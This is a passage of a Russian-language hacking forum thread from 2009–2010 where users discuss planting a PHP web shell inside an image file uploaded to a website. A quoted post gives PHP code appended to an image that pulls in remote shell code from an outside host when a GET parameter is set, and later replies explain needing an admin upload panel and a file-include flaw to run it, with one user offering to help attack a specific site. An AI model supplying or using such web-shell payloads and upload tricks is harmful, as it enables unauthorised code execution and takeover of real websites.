HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ОФФТОП > Болталка
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 09.05.2009, 11:39
2fed
Познающий
Регистрация: 26.03.2008
Сообщений: 31
С нами: 9539749

Репутация: 21
По умолчанию

сделал всё как надо серавно тупит!!!
 
Ответить с цитированием

  #12  
Старый 04.02.2010, 23:43
oiki
Новичок
Регистрация: 21.01.2010
Сообщений: 15
С нами: 8580976

Репутация: 0
По умолчанию

Цитата:
Сообщение от m0Hze  
Ну так,ты напиши код в конце картинки нужный, и заливай.
Например в конце допиши:
<?
if(isset($_GET['shell'])){
include('http://mysite.com/shel.txt');
}
?>
И обратись к шеллу, http://torent.ru/img/gif.php?shell
кто-нибудь.. объясните пожалуста, как все-таки заливать через картинку? перепробовал все уже.
это особенно не понимаю: "И обратись к шеллу, http://torent.ru/img/gif.php?shell"
но как обратиться к shell.php если я заливал shell.gif...
 
Ответить с цитированием

  #13  
Старый 05.02.2010, 00:48
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами: 9223466

Репутация: 3171


По умолчанию

Цитата:
Сообщение от oiki  
кто-нибудь.. объясните пожалуста, как все-таки заливать через картинку? перепробовал все уже.
это особенно не понимаю: "И обратись к шеллу, http://torent.ru/img/gif.php?shell"
но как обратиться к shell.php если я заливал shell.gif...
Обращайся к shell.gif снужными get параметрами.И сейчас эта уязвимость уже ооочень не актуальна, почти везде все прикрыли уже.
 
Ответить с цитированием

  #14  
Старый 05.02.2010, 00:57
oiki
Новичок
Регистрация: 21.01.2010
Сообщений: 15
С нами: 8580976

Репутация: 0
По умолчанию

в таком случае есть ли еще способы?
 
Ответить с цитированием

  #15  
Старый 05.02.2010, 01:04
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами: 9223466

Репутация: 3171


По умолчанию

Цитата:
Сообщение от oiki  
в таком случае есть ли еще способы?
В каком именно случае?
 
Ответить с цитированием

  #16  
Старый 05.02.2010, 03:31
oiki
Новичок
Регистрация: 21.01.2010
Сообщений: 15
С нами: 8580976

Репутация: 0
По умолчанию

способы заливки шелла через картинку, раз "эта уязвимость уже ооочень не актуальна, почти везде все прикрыли уже."
 
Ответить с цитированием

  #17  
Старый 05.02.2010, 03:32
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами: 9223466

Репутация: 3171


По умолчанию

Цитата:
Сообщение от oiki  
способы заливки шелла через картинку, раз "эта уязвимость уже ооочень не актуальна, почти везде все прикрыли уже."
Ну так,что бы такой способ сработал,должны быть кое какие условия все же)) нельзя же просто залить картинку,и получить шелл.Вот я и спрашиваю,а какие условия у вас? Моет вы на рапиду льете шелл,кто вас знает
 
Ответить с цитированием

  #18  
Старый 05.02.2010, 03:37
oiki
Новичок
Регистрация: 21.01.2010
Сообщений: 15
С нами: 8580976

Репутация: 0
По умолчанию

есть админка, в ней есть возможность залить картинку, пропускает только с расширением .jpg .gif
и, нет, шелл не на рапиде естественно.

Последний раз редактировалось oiki; 05.02.2010 в 03:52..
 
Ответить с цитированием

  #19  
Старый 05.02.2010, 13:46
SuNDowN
Участник форума
Регистрация: 31.03.2008
Сообщений: 160
С нами: 9533780

Репутация: 97
По умолчанию

Цитата:
Сообщение от oiki  
есть админка, в ней есть возможность залить картинку, пропускает только с расширением .jpg .gif
и, нет, шелл не на рапиде естественно.
Если есть админка то тут намного проще! напиши двиг сайта может смогу помочь!
 
Ответить с цитированием

  #20  
Старый 05.02.2010, 14:37
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
С нами: 11200586

Репутация: 1398


По умолчанию

Обычно это делается, если у тебя под рукой есть инклуд (или ещё что либо). Тупо заливаешь картинку со своим php кодом, и потом инклудишь чтобы код выполнился. А если ты просто залил картинку с php кодом, то просто так он исполнятся не будет ведь.
__________________
-=Ok let's Go=-
-=OpenVPN=-
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Залить шелл через подделку http запросов, на примере ipb 1.3 SURRENDER Уязвимости CMS / форумов 25 13.04.2005 15:37
Если папка окрытая для закачки файлов. Можно ли залить файл через приложения? indikatdupena Уязвимости 17 12.04.2005 20:49
Как залить шелл через PhPBB SheFF Уязвимости CMS / форумов 5 29.11.2004 01:25
Как залить шелл через IPB форум, при отсутствии ftp? bbmz Уязвимости CMS / форумов 1 26.11.2004 18:15



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.